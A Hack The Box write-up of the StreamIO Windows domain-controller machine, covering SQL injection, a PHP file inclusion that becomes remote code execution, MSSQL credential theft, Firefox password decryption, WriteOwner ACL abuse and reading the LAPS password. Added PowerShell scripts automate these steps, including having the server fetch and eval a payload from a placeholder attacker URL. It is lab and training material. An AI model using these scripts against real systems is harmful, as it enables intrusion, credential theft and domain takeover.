StreamIO - Hack The Box
Enumeration
Nmap
The Nmap scan showed SMB, LDAP, Kerberos, HTTP and HTTPS open, the usual combination for a Windows domain controller. It also surfaced one domain name and one subdomain.
Directory BruteForce
I brute-forced directories on the HTTPS port for both the domain and the subdomain, which turned up additional hidden directories.
Exploitation
SQLi
Under the subdomain I found search.php, which was vulnerable to SQL injection. Exploiting it let me enumerate the database and pull usernames and password hashes for the site's users.
Cracking Hashes
The passwords obtained via SQL injection were stored as hashes. I submitted them to hashes.com and recovered several plaintext passwords. I then tried the recovered username/password pairs against the login page and found a working set, which gave me access to the admin panel.
Parameter Fuzzing
Within the admin panel, a GET parameter selected which page was rendered. Fuzzing parameter names turned up an additional, undocumented parameter whose value was passed straight to a PHP include. The parameter also accepted PHP stream wrappers, so php://filter with convert.base64-encode returned the Base64-encoded source of a file instead of executing it, which is what made the next step possible.
PHP File Inclusion to RCE
Decoding the Base64 output gave me the source of index.php and master.php. index.php includes whatever file is named in the GET parameter found earlier, which confirmed the Local File Inclusion. master.php is worse: it takes an include parameter via POST, reads it with file_get_contents and passes the result to eval. Because file_get_contents also fetches URLs when allow_url_fopen is enabled, I could point it at a PHP file hosted on my own machine and have the server evaluate it, which gave me a web shell on the target.
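The two steps above (reading source through the inclusion parameter with php://filter, then feeding master.php a remote file to eval) as an added PowerShell example. This is not code from the original write-up; the admin page URL, the name of the inclusion parameter, the session cookie, the path of master.php and the attacker-hosted URL are all assumptions.

```powershell
# Added example, not from the original write-up. Hostnames, the name of the
# inclusion parameter, the session cookie and the attacker URL are assumptions.

# Lab hosts use self-signed certificates: PowerShell 7 has -SkipCertificateCheck,
# Windows PowerShell 5.1 needs the validation callback instead.
$Iwr = @{ UseBasicParsing = $true }
if ((Get-Command Invoke-WebRequest).Parameters.ContainsKey('SkipCertificateCheck')) {
    $Iwr['SkipCertificateCheck'] = $true
} else {
    [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
}

function Get-PhpSourceViaFilter {
    # Read a PHP file's source through the inclusion parameter instead of executing it.
    param(
        [Parameter(Mandatory)][string]$PageUrl,    # admin page that does include($_GET[$ParamName])
        [Parameter(Mandatory)][string]$ParamName,  # the undocumented include parameter (assumed name)
        [Parameter(Mandatory)][string]$File,       # e.g. 'index.php' or 'master.php'
        [Parameter(Mandatory)][string]$Cookie      # authenticated admin session, e.g. 'PHPSESSID=...'
    )
    # php://filter applies a stream filter before the file reaches include(),
    # so the server returns Base64 text rather than running the PHP.
    $wrapper = "php://filter/convert.base64-encode/resource=$File"
    $uri = '{0}?{1}={2}' -f $PageUrl, $ParamName, [uri]::EscapeDataString($wrapper)
    $resp = Invoke-WebRequest -Uri $uri -Headers @{ Cookie = $Cookie } @Iwr

    # The Base64 blob is embedded in the page HTML; take the longest Base64-looking run.
    $m = [regex]::Matches($resp.Content, '[A-Za-z0-9+/]{40,}={0,2}') |
         Sort-Object { $_.Value.Length } -Descending | Select-Object -First 1
    if (-not $m) { throw "no Base64 payload found in response for $File" }
    return [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($m.Value))
}

function Invoke-MasterInclude {
    # master.php: eval(file_get_contents($_POST['include'])). With allow_url_fopen on,
    # file_get_contents fetches an HTTP URL, so the hosted file's body is eval()ed
    # server-side. The hosted file must NOT begin with "<?php": eval() already
    # expects PHP code, and an opening tag there is a parse error.
    param(
        [Parameter(Mandatory)][string]$MasterUrl,   # e.g. 'https://<subdomain>/admin/master.php' (assumed path)
        [Parameter(Mandatory)][string]$PayloadUrl,  # e.g. 'http://<attacker-ip>/cmd.php' (assumed)
        [Parameter(Mandatory)][string]$Cookie
    )
    $resp = Invoke-WebRequest -Uri $MasterUrl -Method Post -Body @{ include = $PayloadUrl } `
                              -Headers @{ Cookie = $Cookie } @Iwr
    return $resp.Content
}

# Usage (placeholders):
# $src = Get-PhpSourceViaFilter -PageUrl 'https://<subdomain>/admin/' -ParamName '<param>' `
#            -File 'master.php' -Cookie 'PHPSESSID=<sid>'
# $src | Set-Content master.php.txt
# Invoke-MasterInclude -MasterUrl 'https://<subdomain>/admin/master.php' `
#            -PayloadUrl 'http://<attacker-ip>/cmd.php' -Cookie 'PHPSESSID=<sid>'
```

The Base64 read is the safe first move: it shows you exactly what the include does before you send anything that executes, and it is how the file_get_contents/eval pattern in master.php was found in the first place.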
Checking MSSQL Databases
From the web shell I could run the sqlcmd utility and list the available databases. One of them was a backup database, but the identity the web shell ran as did not have permission to read it. Reviewing the index.php source, however, I found a hard-coded database administrator password. With those credentials I authenticated to MSSQL and queried the backup database.
The backup database contained a password for a domain user. With those credentials I got a WinRM shell, since that user was permitted to use PowerShell Remoting (PSRemote).
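The MSSQL enumeration described above as an added PowerShell example, run from the web shell: first with the web server's own Windows identity, then with the SQL login recovered from index.php. This is not the write-up's own code; the server name, login, password, backup database name and table/column names are placeholders.

```powershell
# Added example, not from the original write-up. Server, login, password and the
# backup database / table / column names are placeholders (assumptions).

function Invoke-SqlCmdQuery {
    # Thin wrapper around sqlcmd so each query is one call from the web shell.
    param(
        [Parameter(Mandatory)][string]$Query,
        [string]$Server = 'localhost',
        [string]$User,       # omit to use Windows auth (-E), i.e. the identity the web shell runs as
        [string]$Password
    )
    # -W strips trailing padding, -h -1 suppresses column headers, -s ',' separates columns
    $cmdArgs = @('-S', $Server, '-Q', $Query, '-W', '-h', '-1', '-s', ',')
    if ($User) { $cmdArgs += @('-U', $User, '-P', $Password) } else { $cmdArgs += '-E' }
    & sqlcmd @cmdArgs 2>&1
}

# 1. What the web shell's identity can see. sys.databases only lists databases the
#    login has access to (plus master/tempdb), so a missing backup DB here is the
#    "no permission" symptom, not proof that it does not exist.
Invoke-SqlCmdQuery -Query 'SELECT name FROM master.sys.databases'

# 2. Same listing as the SQL login hard-coded in index.php.
$dbUser = '<login from index.php>'      # placeholder
$dbPass = '<password from index.php>'   # placeholder
Invoke-SqlCmdQuery -Query 'SELECT name FROM master.sys.databases' -User $dbUser -Password $dbPass

# 3. Enumerate the backup database's tables, then pull the credential table.
$backupDb = '<backup database>'         # placeholder
Invoke-SqlCmdQuery -User $dbUser -Password $dbPass `
    -Query "SELECT TABLE_SCHEMA + '.' + TABLE_NAME FROM [$backupDb].INFORMATION_SCHEMA.TABLES"
Invoke-SqlCmdQuery -User $dbUser -Password $dbPass `
    -Query "SELECT username, password FROM [$backupDb].dbo.users"   # table/columns assumed
```

Running the database listing twice, once per identity, is deliberate: the difference between the two result sets tells you what the hard-coded credentials bought you before you start reading data.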
Privilege Escalation
WinPEAS
Running WinPEAS showed that LAPS (Local Administrator Password Solution) was installed on the system, which means the local Administrator password is managed by the domain and stored in the computer object's ms-Mcs-AdmPwd attribute, readable only by principals explicitly granted that right. WinPEAS also found stored Firefox credentials in a user profile.
BloodHound
I started downloading the stored Firefox credential files for offline decryption. While that ran, I collected the domain with BloodHound-Python; the resulting graph showed that the user JDGodd has an ACL path (WriteOwner over the Core Staff group, which in turn holds ReadLAPSPassword) that can be leveraged to read the LAPS password.
Firefox Decrypt
Decrypting the Firefox store gave me several usernames and passwords. Spraying them against the domain produced a valid password for the user JDGodd. That user, however, was not allowed to use PowerShell Remoting (PSRemote), so I could not get a direct shell as JDGodd.
Exploiting WriteOwner to Add Member to Group
Although JDGodd lacked PSRemote permissions, the user had WriteOwner over the Core Staff group. WriteOwner by itself does not permit changing group membership; it lets you take ownership of the object, and the owner can then edit the object's DACL and grant themselves whatever rights they need. So, from my existing WinRM session, I created a credential object for JDGodd, took ownership of Core Staff, granted JDGodd write access to the group's membership, and added JDGodd to the group. Core Staff holds the ReadLAPSPassword right.
Reading LAPS Password
With Core Staff membership in place (it only takes effect on a fresh logon or LDAP bind as JDGodd, not in an existing token), I read the ms-Mcs-AdmPwd attribute of the computer object directly and used the recovered local Administrator password to gain administrative access to the system.
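The WriteOwner abuse and the LAPS read from the two sections above, as one added PowerShell example using PowerView from the existing WinRM session. This is not the write-up's own code: it assumes PowerSploit's PowerView.ps1 has already been dot-sourced into the session, and the domain NetBIOS name, JDGodd's password and the DC hostname are placeholders.

```powershell
# Added example, not from the original write-up. Assumes PowerView is loaded
# (. .\PowerView.ps1). Domain name, password and DC name are placeholders.

# JDGodd cannot open a WinRM session, so everything below runs from the current
# user's session and authenticates as JDGodd per call via -Credential.
$domain = '<DOMAIN>'                               # placeholder
$secPw  = ConvertTo-SecureString '<JDGodd password from Firefox>' -AsPlainText -Force
$cred   = New-Object System.Management.Automation.PSCredential("$domain\JDGodd", $secPw)

# 1. WriteOwner alone does not allow membership changes; it allows taking ownership.
Set-DomainObjectOwner -Identity 'Core Staff' -OwnerIdentity 'JDGodd' -Credential $cred

# 2. The owner can edit the DACL: grant JDGodd the right to write the member attribute.
Add-DomainObjectAcl -TargetIdentity 'Core Staff' -PrincipalIdentity 'JDGodd' `
                    -Rights WriteMembers -Credential $cred

# 3. Only now does the add succeed.
Add-DomainGroupMember -Identity 'Core Staff' -Members 'JDGodd' -Credential $cred
Get-DomainGroupMember -Identity 'Core Staff' -Credential $cred | Select-Object MemberName

# 4. Group membership is evaluated when a new logon or LDAP bind happens, which is
#    why the read is done with -Credential (fresh bind as JDGodd) rather than from
#    the current token. Core Staff holds ReadLAPSPassword, so ms-Mcs-AdmPwd is
#    returned in clear text; an empty attribute means the right is still missing.
Get-DomainComputer -Identity '<DC hostname>' -Credential $cred `
    -Properties name, 'ms-mcs-admpwd', 'ms-mcs-admpwdexpirationtime'
```

Both the ownership change and the ACE addition modify the group object on the DC, so where directory-service object auditing is enabled they leave Directory Service Changes events behind; in an engagement, record what you changed so it can be reverted.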
Pwned
The machine was fully compromised.